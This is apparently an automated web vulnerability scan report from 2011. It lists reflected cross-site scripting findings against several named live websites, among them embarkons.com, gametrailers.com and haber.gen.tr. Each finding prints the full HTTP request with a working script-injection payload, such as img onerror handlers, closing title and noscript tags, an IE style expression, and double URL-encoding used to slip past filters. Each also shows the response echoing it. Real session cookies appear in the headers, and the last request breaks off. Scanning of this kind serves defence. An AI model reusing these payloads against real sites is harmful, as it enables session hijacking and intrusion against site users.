Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad was submitted in the REST URL parameter 3. This input was echoed as 6be61<img src=a onerror=alert(1)>314a004caad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postit-bulb.gif6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:52 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postit-bulb.gif6be61<img src=a onerror=alert(1)>314a004caad</div>
...[SNIP]...
4.101. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b was submitted in the REST URL parameter 3. This input was echoed as 4ef80<img src=a onerror=alert(1)>f6413b1c94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postitsubmitbtn.png4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postitsubmitbtn.png4ef80<img src=a onerror=alert(1)>f6413b1c94b</div>
...[SNIP]...
4.102. http://www.embarkons.com/sharer.php/images/search-con.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e was submitted in the REST URL parameter 3. This input was echoed as e1832<img src=a onerror=alert(1)>f94e94396e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/search-con.gife1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:54 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">search-con.gife1832<img src=a onerror=alert(1)>f94e94396e</div>
...[SNIP]...
4.103. http://www.embarkons.com/sharer.php/src/captcha.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 was submitted in the REST URL parameter 3. This input was echoed as 57a50<img src=a onerror=alert(1)>9823491c1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:58 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">captcha.php57a50<img src=a onerror=alert(1)>9823491c1f8</div>
...[SNIP]...
4.104. http://www.embarkons.com/sharer.php/src/captcha.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c1f1<img src=a onerror=alert(1)>7a467385bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php/4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:55 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">4c1f1<img src=a onerror=alert(1)>7a467385bc8</div>
...[SNIP]...
4.105. http://www.favlog.de/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.favlog.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 was submitted in the REST URL parameter 1. This input was echoed as 4b394\" style=x:expression(alert(1)) 3927ed65879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 HTTP/1.1
Host: www.favlog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:17 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k mod_jk/1.2.26 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=9ccdeh3nqm7lod25rvsqul5or5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<a href="/upcoming/submit.php4b394\" style=x:expression(alert(1)) 3927ed65879">
...[SNIP]...
4.106. http://www.gabbr.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593 was submitted in the REST URL parameter 1. This input was echoed as 48e8d</title><script>alert(1)</script>c3a4c354593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /submit48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a3c686927d5809dba33b96974e73b08; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 35636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<title>Gabbr.com: Submit48e8d</title><script>alert(1)</script>c3a4c354593</title>
...[SNIP]...
4.107. http://www.gametrailers.com/remote_wrap.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /remote_wrap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 was submitted in the REST URL parameter 1. This input was echoed as 217ce"><img src=a onerror=alert(1)>9c0af3ddee0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /remote_wrap.php217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 HTTP/1.1
Host: www.gametrailers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Pragma: akamai-x-cache-on
Accept-ESI: 1.0
X-GT-Cache-Key: s=_404_php,r=_remote_wrap_php217ce_22_3e_3cimg_20src_3da_20onerror_3dalert_281_29_3e9c0af3ddee0,key=remote_wrap.php217ce%22%3e%3cimg%20src%3da%20onerror%3dalert%281%29%3e9c0af3ddee0
Content-Type: text/html
Cache-Control: max-age=1200
Date: Sun, 17 Apr 2011 14:15:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sun, 17-Apr-2011 20:15:10 GMT; path=/
Vary: User-Agent
Content-Length: 34633

<!DOCTYPE html public "-//w3c//dtd html 4.01 transitional//en"
"http://www.w3.org/tr/html4/loose.dtd">
   <html>

<head>
   <title>404 - Video Game Trailers for Wii, PSP, Xbox, PS3 & More | Upcoming
...[SNIP]...
<script type="text/javascript" src="/ui/php/inc.php?uri=/remote_wrap.php217ce"><img src=a onerror=alert(1)>9c0af3ddee0">
...[SNIP]...
4.108. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3025a</noscript><script>alert(1)</script>81d6fe8ab38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:43 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...
4.109. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload aaedb</noscript><script>alert(1)</script>2cfa6db0fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:44 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...
4.110. http://www.haber.gen.tr/edit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7fd"><script>alert(1)</script>0550415377b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /editac7fd"><script>alert(1)</script>0550415377b HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 13:52:27 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f13320fbf75a3c23016d2ee5bddaf39d; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 63739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/editac7fd"><script>alert(1)</script>0550415377b" type="hidden" />
...[SNIP]...
4.111. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 255cd"><script>alert(1)</script>7d1b8b1193c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico" type="hidden" />
...[SNIP]...
4.112. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f07"><script>alert(1)</script>a5748c90cb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8" type="hidden" />
...[SNIP]...
4.113. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ab3"><script>alert(1)</script>471d70f85ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
